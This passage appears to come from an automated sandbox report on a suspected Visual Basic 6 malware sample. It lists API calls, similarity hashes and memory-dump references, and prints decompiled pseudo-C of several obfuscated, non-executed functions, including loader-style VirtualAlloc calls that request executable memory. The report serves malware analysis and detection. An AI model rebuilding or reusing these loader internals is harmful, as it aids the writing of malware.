APIs

VirtualAlloc.KERNELBASE(00000000,0000C000,00001000,00000040), ref: 0040AA68

Memory Dump Source

Source File: 00000000.00000002.810803883.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.810789403.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.810825715.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.810833136.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 85ec5f811992ea16342ca6a92d948b43216ad247aedfad6336106f0e501dd75f
Instruction ID: 13d8bbb5d3fc32b171296ce4d0895c58db40ba280fcce4baa36d979d0afe7ea1
Opcode Fuzzy Hash: 85ec5f811992ea16342ca6a92d948b43216ad247aedfad6336106f0e501dd75f
Instruction Fuzzy Hash: FD91D241E2A30685EF732130C9D079D6681CF56781F718F37D865F58D2BA2F85CA198B

Uniqueness

Uniqueness Score: -1.00%

Function 0040A7CD, Relevance: 1.6, APIs: 1, Instructions: 396memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000C000,00001000,00000040), ref: 0040AA68

Memory Dump Source

Source File: 00000000.00000002.810803883.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.810789403.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.810825715.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.810833136.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 7b23db886a7e8193becc5ad39db024b8091677a1ac67dbecc4ed869e7f56305a
Instruction ID: ebf81b87d3281e8d1d4b1c024d3772cecbb49db274340fbcc7b34c36b2e0aa3e
Opcode Fuzzy Hash: 7b23db886a7e8193becc5ad39db024b8091677a1ac67dbecc4ed869e7f56305a
Instruction Fuzzy Hash: 3DB1EF41E6A34685EF732030C9D079DA690DF56781F318F3BD826F58D2BA2F85CA158B

Uniqueness

Uniqueness Score: -1.00%

Function 0040A8F2, Relevance: 1.6, APIs: 1, Instructions: 361memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000C000,00001000,00000040), ref: 0040AA68

Memory Dump Source

Source File: 00000000.00000002.810803883.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.810789403.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.810825715.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.810833136.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 5eec66460fbc421feb2771157615398b0af2af8e47ddde462e9016c0ce15ca9e
Instruction ID: 2ca646261ff071d42377efc89d7493f1f76dac2eabe235f6d7a2ffa521c67549
Opcode Fuzzy Hash: 5eec66460fbc421feb2771157615398b0af2af8e47ddde462e9016c0ce15ca9e
Instruction Fuzzy Hash: A0A1B041E6A34685EF732030C9D075DA680CF56781F318F37D866F58D2BA2F85CA158B

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00411BD8, Relevance: 43.9, APIs: 21, Strings: 4, Instructions: 186
COMMON

Download Yara Rule

C-Code - Quality: 25%

			E00411BD8(void* __ebx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v32;
				intOrPtr _v36;
				char _v40;
				void* _v44;
				char _v60;
				char _v64;
				char* _v72;
				intOrPtr _v80;
				char* _v88;
				intOrPtr _v96;
				intOrPtr _v104;
				intOrPtr _v112;
				intOrPtr* _v132;
				signed int _v136;
				intOrPtr* _v140;
				signed int _v144;
				short _v148;
				intOrPtr* _v164;
				signed int _v168;
				signed int _v172;
				intOrPtr* _v176;
				signed int _v180;
				signed int _t81;
				signed int _t86;
				char* _t91;
				signed int _t99;
				void* _t123;
				intOrPtr _t124;

				_t124 = _t123 - 0x10;
				_push(0x401486);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t124;
				L00401480();
				_v20 = _t124;
				_v16 = 0x401468;
				_v12 = 0;
				_v8 = 0;
				_push(0x40e38c);
				L00401522();
				if(0x98 != 2) {
					_v72 = L"radikalers";
					_v80 = 8;
					_v104 = 0x2ee93d;
					_v112 = 3;
					_push(0x10);
					L00401480();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(0x10);
					L00401480();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(2);
					_push(L"ZtCWquSptjSm3r57PeAjpdM80");
					_push(_v36);
					L00401600();
					_t124 = _t124 + 0x2c;
				}
				_push(0);
				L004015B2();
				if( *0x41331c != 0) {
					_v164 = 0x41331c;
				} else {
					_push(0x41331c);
					_push(0x40ddec);
					L004016DE();
					_v164 = 0x41331c;
				}
				_v132 =  *_v164;
				_t81 =  *((intOrPtr*)( *_v132 + 0x14))(_v132,  &_v44);
				asm("fclex");
				_v136 = _t81;
				if(_v136 >= 0) {
					_v168 = _v168 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x40dddc);
					_push(_v132);
					_push(_v136);
					L004016D8();
					_v168 = _t81;
				}
				_v140 = _v44;
				_t86 =  *((intOrPtr*)( *_v140 + 0x50))(_v140,  &_v40);
				asm("fclex");
				_v144 = _t86;
				if(_v144 >= 0) {
					_v172 = _v172 & 0x00000000;
				} else {
					_push(0x50);
					_push(0x40ddfc);
					_push(_v140);
					_push(_v144);
					L004016D8();
					_v172 = _t86;
				}
				_push(_v40);
				_push(0);
				L00401690();
				asm("sbb eax, eax");
				_v148 =  ~( ~_t86 + 1);
				L004016C6();
				L004016C0();
				if(_v148 != 0) {
					if( *0x41331c != 0) {
						_v176 = 0x41331c;
					} else {
						_push(0x41331c);
						_push(0x40ddec);
						L004016DE();
						_v176 = 0x41331c;
					}
					_v132 =  *_v176;
					_v88 = L"Notepaper9";
					_v96 = 8;
					_v72 = 0xfd;
					_v80 = 2;
					L00401480();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					L00401480();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t99 =  *((intOrPtr*)( *_v132 + 0x38))(_v132, 0x10, 0x10,  &_v60);
					asm("fclex");
					_v136 = _t99;
					if(_v136 >= 0) {
						_v180 = _v180 & 0x00000000;
					} else {
						_push(0x38);
						_push(0x40dddc);
						_push(_v132);
						_push(_v136);
						L004016D8();
						_v180 = _t99;
					}
					_push( &_v60);
					_push( &_v64);
					L00401516();
					_push( &_v64);
					_push( &_v32);
					L0040151C();
					L00401696();
				}
				_push(0x411ea7);
				_t91 =  &_v32;
				_push(_t91);
				_push(0);
				L0040158E();
				L004016C0();
				return _t91;
			}

0x00411bdb
0x00411bde
0x00411be9
0x00411bea
0x00411bf6
0x00411bfe
0x00411c01
0x00411c08
0x00411c0f
0x00411c16
0x00411c1b
0x00411c28
0x00411c2a
0x00411c31
0x00411c38
0x00411c3f
0x00411c46
0x00411c49
0x00411c53
0x00411c54
0x00411c55
0x00411c56
0x00411c57
0x00411c5a
0x00411c64
0x00411c65
0x00411c66
0x00411c67
0x00411c68
0x00411c6a
0x00411c6f
0x00411c72
0x00411c77
0x00411c77
0x00411c7a
0x00411c7c
0x00411c88
0x00411ca5
0x00411c8a
0x00411c8a
0x00411c8f
0x00411c94
0x00411c99
0x00411c99
0x00411cb7
0x00411cc6
0x00411cc9
0x00411ccb
0x00411cd8
0x00411cf7
0x00411cda
0x00411cda
0x00411cdc
0x00411ce1
0x00411ce4
0x00411cea
0x00411cef
0x00411cef
0x00411d01
0x00411d19
0x00411d1c
0x00411d1e
0x00411d2b
0x00411d4d
0x00411d2d
0x00411d2d
0x00411d2f
0x00411d34
0x00411d3a
0x00411d40
0x00411d45
0x00411d45
0x00411d54
0x00411d57
0x00411d59
0x00411d60
0x00411d65
0x00411d6f
0x00411d77
0x00411d85
0x00411d92
0x00411daf
0x00411d94
0x00411d94
0x00411d99
0x00411d9e
0x00411da3
0x00411da3
0x00411dc1
0x00411dc4
0x00411dcb
0x00411dd2
0x00411dd9
0x00411de7
0x00411df1
0x00411df2
0x00411df3
0x00411df4
0x00411df8
0x00411e02
0x00411e03
0x00411e04
0x00411e05
0x00411e0e
0x00411e11
0x00411e13
0x00411e20
0x00411e3f
0x00411e22
0x00411e22
0x00411e24
0x00411e29
0x00411e2c
0x00411e32
0x00411e37
0x00411e37
0x00411e49
0x00411e4d
0x00411e4e
0x00411e56
0x00411e5a
0x00411e5b
0x00411e63
0x00411e63
0x00411e68
0x00411e93
0x00411e96
0x00411e97
0x00411e99
0x00411ea1
0x00411ea6

APIs

__vbaChkstk.MSVBVM60(?,00401486), ref: 00411BF6
__vbaUI1Str.MSVBVM60(0040E38C,?,?,?,?,00401486), ref: 00411C1B
__vbaChkstk.MSVBVM60 ref: 00411C49
__vbaChkstk.MSVBVM60 ref: 00411C5A
__vbaLateMemCall.MSVBVM60(?,ZtCWquSptjSm3r57PeAjpdM80,00000002), ref: 00411C72
__vbaOnError.MSVBVM60(00000000,0040E38C,?,?,?,?,00401486), ref: 00411C7C
__vbaNew2.MSVBVM60(0040DDEC,0041331C,00000000,0040E38C,?,?,?,?,00401486), ref: 00411C94
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DDDC,00000014), ref: 00411CEA
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DDFC,00000050), ref: 00411D40
__vbaStrCmp.MSVBVM60(00000000,?), ref: 00411D59
__vbaFreeStr.MSVBVM60(00000000,?), ref: 00411D6F
__vbaFreeObj.MSVBVM60(00000000,?), ref: 00411D77
__vbaNew2.MSVBVM60(0040DDEC,0041331C,00000000,?), ref: 00411D9E
__vbaChkstk.MSVBVM60(?,00000000,?), ref: 00411DE7
__vbaChkstk.MSVBVM60(?,00000000,?), ref: 00411DF8
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DDDC,00000038), ref: 00411E32
__vbaVar2Vec.MSVBVM60(?,?), ref: 00411E4E
__vbaAryMove.MSVBVM60(?,?,?,?), ref: 00411E5B
__vbaFreeVar.MSVBVM60(?,?,?,?), ref: 00411E63
__vbaAryDestruct.MSVBVM60(00000000,?,00411EA7,00000000,?), ref: 00411E99
__vbaFreeObj.MSVBVM60(00000000,?,00411EA7,00000000,?), ref: 00411EA1

Strings

Notepaper9, xrefs: 00411DC4
ZtCWquSptjSm3r57PeAjpdM80, xrefs: 00411C6A
=., xrefs: 00411C38
radikalers, xrefs: 00411C2A

Memory Dump Source

Source File: 00000000.00000002.810803883.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.810789403.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.810825715.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.810833136.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Chkstk$Free$CheckHresult$New2$CallDestructErrorLateMoveVar2
String ID: =.$Notepaper9$ZtCWquSptjSm3r57PeAjpdM80$radikalers
API String ID: 444379525-170888267
Opcode ID: 550e803d434d0a85f61addfedca9c0dd8ecaf4be2b51071f30b4d65299a2a7b2
Instruction ID: 3d8c7c04bd69e42996063b4f44fc5bde5de9eda2ed772515e155fee1ba89927a
Opcode Fuzzy Hash: 550e803d434d0a85f61addfedca9c0dd8ecaf4be2b51071f30b4d65299a2a7b2
Instruction Fuzzy Hash: 04713971D002189FCB10EF95CC45BDDBBB5BF05304F1084AAF905BB1A1DBB95A899F19

Uniqueness

Uniqueness Score: -1.00%

Function 00410EC6, Relevance: 43.9, APIs: 22, Strings: 3, Instructions: 155
COMMON

Download Yara Rule

C-Code - Quality: 49%

			E00410EC6(void* __ebx, void* __edi, void* __esi, long long __fp0, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				long long _v32;
				intOrPtr _v36;
				void* _v40;
				void* _v44;
				char _v60;
				char* _v68;
				intOrPtr _v76;
				void* _v80;
				signed int _v84;
				intOrPtr* _v88;
				signed int _v92;
				intOrPtr* _v104;
				signed int _v108;
				signed int _v112;
				signed int _t62;
				signed int _t66;
				signed int _t76;
				signed int _t81;
				void* _t103;
				void* _t105;
				intOrPtr _t106;
				long long _t112;

				_t112 = __fp0;
				_t106 = _t105 - 0xc;
				 *[fs:0x0] = _t106;
				L00401480();
				_v16 = _t106;
				_v12 = 0x4013d0;
				_v8 = 0;
				_t62 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x58,  *[fs:0x0], 0x401486, _t103);
				_push(0x40e288);
				L00401570();
				L0040168A();
				_push(_t62);
				_push(0x40dea4);
				L00401690();
				asm("sbb eax, eax");
				_v80 =  ~( ~( ~_t62));
				L004016C6();
				_t66 = _v80;
				if(_t66 != 0) {
					_push(0);
					_push(L"sindrig");
					_push( &_v60);
					L004015D6();
					_t66 = 0x10;
					L00401480();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(0);
					_push(_v36);
					L00401630();
					L00401696();
				}
				_push(1);
				_push(0x40e2a4);
				L0040156A();
				L0040168A();
				_push(_t66);
				_push(0x40e288);
				L00401690();
				asm("sbb eax, eax");
				_v80 =  ~( ~( ~_t66));
				L004016C6();
				if(_v80 != 0) {
					_v68 = L"Subindices5";
					_v76 = 8;
					L0040167E();
					_push(2);
					_push( &_v60);
					L00401564();
					_v32 = _t112;
					L00401696();
				}
				if( *0x41331c != 0) {
					_v104 = 0x41331c;
				} else {
					_push(0x41331c);
					_push(0x40ddec);
					L004016DE();
					_v104 = 0x41331c;
				}
				_v80 =  *_v104;
				_t76 =  *((intOrPtr*)( *_v80 + 0x14))(_v80,  &_v44);
				asm("fclex");
				_v84 = _t76;
				if(_v84 >= 0) {
					_v108 = _v108 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x40dddc);
					_push(_v80);
					_push(_v84);
					L004016D8();
					_v108 = _t76;
				}
				_v88 = _v44;
				_v68 = 0x80020004;
				_v76 = 0xa;
				L00401480();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t81 =  *((intOrPtr*)( *_v88 + 0x13c))(_v88, L"luftkonditioneringen", 0x10);
				asm("fclex");
				_v92 = _t81;
				if(_v92 >= 0) {
					_v112 = _v112 & 0x00000000;
				} else {
					_push(0x13c);
					_push(0x40ddfc);
					_push(_v88);
					_push(_v92);
					L004016D8();
					_v112 = _t81;
				}
				L004016C0();
				asm("wait");
				_push(0x4110d8);
				L004016C0();
				return _t81;
			}

0x00410ec6
0x00410ec9
0x00410ed8
0x00410ee2
0x00410eea
0x00410eed
0x00410ef4
0x00410f03
0x00410f06
0x00410f0b
0x00410f15
0x00410f1a
0x00410f1b
0x00410f20
0x00410f27
0x00410f2d
0x00410f34
0x00410f39
0x00410f3f
0x00410f41
0x00410f43
0x00410f4b
0x00410f4c
0x00410f53
0x00410f54
0x00410f5e
0x00410f5f
0x00410f60
0x00410f61
0x00410f62
0x00410f64
0x00410f67
0x00410f6f
0x00410f6f
0x00410f74
0x00410f76
0x00410f7b
0x00410f85
0x00410f8a
0x00410f8b
0x00410f90
0x00410f97
0x00410f9d
0x00410fa4
0x00410faf
0x00410fb1
0x00410fb8
0x00410fc5
0x00410fca
0x00410fcf
0x00410fd0
0x00410fd5
0x00410fdb
0x00410fdb
0x00410fe7
0x00411001
0x00410fe9
0x00410fe9
0x00410fee
0x00410ff3
0x00410ff8
0x00410ff8
0x0041100d
0x0041101c
0x0041101f
0x00411021
0x00411028
0x00411041
0x0041102a
0x0041102a
0x0041102c
0x00411031
0x00411034
0x00411037
0x0041103c
0x0041103c
0x00411048
0x0041104b
0x00411052
0x0041105c
0x00411066
0x00411067
0x00411068
0x00411069
0x00411077
0x0041107d
0x0041107f
0x00411086
0x004110a2
0x00411088
0x00411088
0x0041108d
0x00411092
0x00411095
0x00411098
0x0041109d
0x0041109d
0x004110a9
0x004110ae
0x004110af
0x004110d2
0x004110d7

APIs

__vbaChkstk.MSVBVM60(?,00401486), ref: 00410EE2
#517.MSVBVM60(0040E288,?,?,?,?,00401486), ref: 00410F0B
__vbaStrMove.MSVBVM60(0040E288,?,?,?,?,00401486), ref: 00410F15
__vbaStrCmp.MSVBVM60(0040DEA4,00000000,0040E288,?,?,?,?,00401486), ref: 00410F20
__vbaFreeStr.MSVBVM60(0040DEA4,00000000,0040E288,?,?,?,?,00401486), ref: 00410F34
#716.MSVBVM60(?,sindrig,00000000,0040DEA4,00000000,0040E288,?,?,?,?,00401486), ref: 00410F4C
__vbaChkstk.MSVBVM60(?,sindrig,00000000,0040DEA4,00000000,0040E288,?,?,?,?,00401486), ref: 00410F54
__vbaLateIdSt.MSVBVM60(?,00000000,?,sindrig,00000000,0040DEA4,00000000,0040E288,?,?,?,?,00401486), ref: 00410F67
__vbaFreeVar.MSVBVM60(?,00000000,?,sindrig,00000000,0040DEA4,00000000,0040E288,?,?,?,?,00401486), ref: 00410F6F
#616.MSVBVM60(0040E2A4,00000001,0040DEA4,00000000,0040E288,?,?,?,?,00401486), ref: 00410F7B
__vbaStrMove.MSVBVM60(0040E2A4,00000001,0040DEA4,00000000,0040E288,?,?,?,?,00401486), ref: 00410F85
__vbaStrCmp.MSVBVM60(0040E288,00000000,0040E2A4,00000001,0040DEA4,00000000,0040E288,?,?,?,?,00401486), ref: 00410F90
__vbaFreeStr.MSVBVM60(0040E288,00000000,0040E2A4,00000001,0040DEA4,00000000,0040E288,?,?,?,?,00401486), ref: 00410FA4
__vbaVarDup.MSVBVM60(0040E288,00000000), ref: 00410FC5
#600.MSVBVM60(00000000,00000002), ref: 00410FD0
__vbaFreeVar.MSVBVM60(00000000,00000002), ref: 00410FDB
__vbaNew2.MSVBVM60(0040DDEC,0041331C,0040E288,00000000,0040E2A4,00000001,0040DEA4,00000000,0040E288,?,?,?,?,00401486), ref: 00410FF3
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DDDC,00000014), ref: 00411037
__vbaChkstk.MSVBVM60(00000000,?,0040DDDC,00000014), ref: 0041105C
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DDFC,0000013C), ref: 00411098
__vbaFreeObj.MSVBVM60(00000000,?,0040DDFC,0000013C), ref: 004110A9
__vbaFreeObj.MSVBVM60(004110D8), ref: 004110D2

Strings

luftkonditioneringen, xrefs: 0041106A
sindrig, xrefs: 00410F43
Subindices5, xrefs: 00410FB1

Memory Dump Source

Source File: 00000000.00000002.810803883.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.810789403.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.810825715.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.810833136.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Chkstk$CheckHresultMove$#517#600#616#716LateNew2
String ID: Subindices5$luftkonditioneringen$sindrig
API String ID: 1911176853-738711162
Opcode ID: fd4bf8e5b455adae1ddea7746b7fdfbaf8f60ab94e46abfb50a69daf21d5957c
Instruction ID: c36a1cb9f0763e74f773e9881c43a6275ef7020c0242b0be70ff93103273715c
Opcode Fuzzy Hash: fd4bf8e5b455adae1ddea7746b7fdfbaf8f60ab94e46abfb50a69daf21d5957c
Instruction Fuzzy Hash: 6B510730D50248ABDF10EFE6C846BEDBBB4AF08704F14442AF501BB1E1DBB95989CB59

Uniqueness

Uniqueness Score: -1.00%

Function 004112FA, Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 197
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E004112FA(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, void* _a32) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				void* _v28;
				intOrPtr _v32;
				signed int _v36;
				char _v40;
				char _v56;
				char* _v80;
				char _v88;
				signed int _v92;
				signed int _v96;
				intOrPtr* _v100;
				signed int _v104;
				intOrPtr _v112;
				intOrPtr* _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				intOrPtr* _v132;
				signed int _v136;
				signed int _v140;
				signed int _t106;
				char* _t109;
				signed int _t110;
				signed int _t116;
				signed int _t122;
				signed int _t125;
				signed int _t131;
				signed int _t135;
				intOrPtr _t159;

				_push(0x401486);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t159;
				_push(0x78);
				L00401480();
				_v12 = _t159;
				_v8 = 0x401400;
				L00401660();
				_push(1);
				_push( &_v56);
				L00401552();
				_v80 = 0x40dec8;
				_v88 = 0x8008;
				_push( &_v56);
				_t106 =  &_v88;
				_push(_t106);
				L00401648();
				_v92 = _t106;
				L00401696();
				if(_v92 != 0) {
					if( *0x41331c != 0) {
						_v116 = 0x41331c;
					} else {
						_push(0x41331c);
						_push(0x40ddec);
						L004016DE();
						_v116 = 0x41331c;
					}
					_v92 =  *_v116;
					_t131 =  *((intOrPtr*)( *_v92 + 0x1c))(_v92,  &_v40);
					asm("fclex");
					_v96 = _t131;
					if(_v96 >= 0) {
						_v120 = _v120 & 0x00000000;
					} else {
						_push(0x1c);
						_push(0x40dddc);
						_push(_v92);
						_push(_v96);
						L004016D8();
						_v120 = _t131;
					}
					_v100 = _v40;
					_t135 =  *((intOrPtr*)( *_v100 + 0x50))(_v100);
					asm("fclex");
					_v104 = _t135;
					if(_v104 >= 0) {
						_v124 = _v124 & 0x00000000;
					} else {
						_push(0x50);
						_push(0x40de3c);
						_push(_v100);
						_push(_v104);
						L004016D8();
						_v124 = _t135;
					}
					L004016C0();
				}
				if(0 != 0) {
					_t125 =  *((intOrPtr*)( *_a4 + 0x710))(_a4);
					_v92 = _t125;
					if(_v92 >= 0) {
						_v128 = _v128 & 0x00000000;
					} else {
						_push(0x710);
						_push(0x40da44);
						_push(_a4);
						_push(_v92);
						L004016D8();
						_v128 = _t125;
					}
				}
				_v80 = L"11/11/11";
				_v88 = 8;
				L0040167E();
				_t109 =  &_v56;
				_push(_t109);
				L00401588();
				_v92 =  ~(0 | _t109 != 0x0000ffff);
				L00401696();
				_t110 = _v92;
				if(_t110 != 0) {
					if( *0x41331c != 0) {
						_v132 = 0x41331c;
					} else {
						_push(0x41331c);
						_push(0x40ddec);
						L004016DE();
						_v132 = 0x41331c;
					}
					_v92 =  *_v132;
					_t116 =  *((intOrPtr*)( *_v92 + 0x1c))(_v92,  &_v40);
					asm("fclex");
					_v96 = _t116;
					if(_v96 >= 0) {
						_v136 = _v136 & 0x00000000;
					} else {
						_push(0x1c);
						_push(0x40dddc);
						_push(_v92);
						_push(_v96);
						L004016D8();
						_v136 = _t116;
					}
					_v100 = _v40;
					_v80 = 0x80020004;
					_v88 = 0xa;
					L00401480();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t122 =  *((intOrPtr*)( *_v100 + 0x5c))(_v100, 0x10,  &_v36);
					asm("fclex");
					_v104 = _t122;
					if(_v104 >= 0) {
						_v140 = _v140 & 0x00000000;
					} else {
						_push(0x5c);
						_push(0x40de3c);
						_push(_v100);
						_push(_v104);
						L004016D8();
						_v140 = _t122;
					}
					_t110 = _v36;
					_v112 = _t110;
					_v36 = _v36 & 0x00000000;
					L0040168A();
					L004016C0();
				}
				_v32 = 0x14a9ee;
				_push(0x4115be);
				L004016C6();
				L004016C6();
				return _t110;
			}

0x004112ff
0x0041130a
0x0041130b
0x00411312
0x00411315
0x0041131d
0x00411320
0x0041132d
0x00411332
0x00411337
0x00411338
0x0041133d
0x00411344
0x0041134e
0x0041134f
0x00411352
0x00411353
0x00411358
0x0041135f
0x0041136a
0x00411377
0x00411391
0x00411379
0x00411379
0x0041137e
0x00411383
0x00411388
0x00411388
0x0041139d
0x004113ac
0x004113af
0x004113b1
0x004113b8
0x004113d1
0x004113ba
0x004113ba
0x004113bc
0x004113c1
0x004113c4
0x004113c7
0x004113cc
0x004113cc
0x004113d8
0x004113e3
0x004113e6
0x004113e8
0x004113ef
0x00411408
0x004113f1
0x004113f1
0x004113f3
0x004113f8
0x004113fb
0x004113fe
0x00411403
0x00411403
0x0041140f
0x0041140f
0x00411418
0x00411422
0x00411428
0x0041142f
0x0041144b
0x00411431
0x00411431
0x00411436
0x0041143b
0x0041143e
0x00411441
0x00411446
0x00411446
0x0041142f
0x0041144f
0x00411456
0x00411463
0x00411468
0x0041146b
0x0041146c
0x0041147c
0x00411483
0x00411488
0x0041148e
0x0041149b
0x004114b5
0x0041149d
0x0041149d
0x004114a2
0x004114a7
0x004114ac
0x004114ac
0x004114c1
0x004114d0
0x004114d3
0x004114d5
0x004114dc
0x004114f8
0x004114de
0x004114de
0x004114e0
0x004114e5
0x004114e8
0x004114eb
0x004114f0
0x004114f0
0x00411502
0x00411505
0x0041150c
0x0041151a
0x00411524
0x00411525
0x00411526
0x00411527
0x00411530
0x00411533
0x00411535
0x0041153c
0x00411558
0x0041153e
0x0041153e
0x00411540
0x00411545
0x00411548
0x0041154b
0x00411550
0x00411550
0x0041155f
0x00411562
0x00411565
0x0041156f
0x00411577
0x00411577
0x0041157c
0x00411583
0x004115b0
0x004115b8
0x004115bd

APIs

__vbaChkstk.MSVBVM60(?,00401486), ref: 00411315
__vbaStrCopy.MSVBVM60(?,?,?,?,00401486), ref: 0041132D
#526.MSVBVM60(?,00000001,?,?,?,?,00401486), ref: 00411338
__vbaVarTstNe.MSVBVM60(00008008,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 00411353
__vbaFreeVar.MSVBVM60(00008008,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 0041135F
__vbaNew2.MSVBVM60(0040DDEC,0041331C,00008008,?), ref: 00411383
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DDDC,0000001C,?,?,?,?,?,00008008,?), ref: 004113C7
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DE3C,00000050,?,?,?,?,?,00008008,?), ref: 004113FE
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,00008008,?), ref: 0041140F
__vbaHresultCheckObj.MSVBVM60(?,?,0040DA44,00000710), ref: 00411441
__vbaVarDup.MSVBVM60(00008008,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 00411463
#557.MSVBVM60(?,00008008,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041146C
__vbaFreeVar.MSVBVM60(?,00008008,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411483
__vbaNew2.MSVBVM60(0040DDEC,0041331C,?,00008008,?), ref: 004114A7
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DDDC,0000001C,?,?,?,?,?,?,?,?,?,00008008,?), ref: 004114EB
__vbaChkstk.MSVBVM60(?,?,?,?,?,?,?,?,?,?,00008008,?), ref: 0041151A
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DE3C,0000005C,?,?,?,?,?,?,?,?,?,00008008,?), ref: 0041154B
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00008008,?), ref: 0041156F
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00008008,?), ref: 00411577
__vbaFreeStr.MSVBVM60(004115BE,?,00008008,?), ref: 004115B0
__vbaFreeStr.MSVBVM60(004115BE,?,00008008,?), ref: 004115B8

Strings

11/11/11, xrefs: 0041144F

Memory Dump Source

Source File: 00000000.00000002.810803883.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.810789403.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.810825715.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.810833136.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$ChkstkNew2$#526#557CopyMove
String ID: 11/11/11
API String ID: 2874651639-2767166760
Opcode ID: a25aaca6c035a202f33c822ca26267b8cd6f029867670061ca42d9940c43ae61
Instruction ID: e25bddee16cfb5960ac3db6c52d1d05aa5a3cfb8806f7f8b5381b668ac4cbd21
Opcode Fuzzy Hash: a25aaca6c035a202f33c822ca26267b8cd6f029867670061ca42d9940c43ae61
Instruction Fuzzy Hash: 4081E070D00248AFDF00EFE5C945BEDBBB5AF08705F20442AE505BB2A1DB7999899F58

Uniqueness

Uniqueness Score: -1.00%

Function 004115D9, Relevance: 38.6, APIs: 19, Strings: 3, Instructions: 127
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E004115D9(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a32) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				void* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				void* _v44;
				long long _v52;
				char _v60;
				char _v84;
				char _v92;
				intOrPtr _v100;
				char _v108;
				signed int _v112;
				signed int _v124;
				signed int _t53;
				signed int _t55;
				signed int _t59;
				char* _t68;
				void* _t76;
				void* _t78;
				intOrPtr* _t79;
				signed int _t81;

				_t79 = _t78 - 0xc;
				 *[fs:0x0] = _t79;
				L00401480();
				_v16 = _t79;
				_v12 = 0x401438;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x64,  *[fs:0x0], 0x401486, _t76);
				L00401660();
				L00401660();
				_v84 =  &_v40;
				_v92 = 0x4008;
				_push( &_v92);
				_push( &_v60);
				L0040154C();
				_v100 = 0x40e31c;
				_v108 = 0x8008;
				_push( &_v60);
				_t53 =  &_v108;
				_push(_t53);
				L00401648();
				_v112 = _t53;
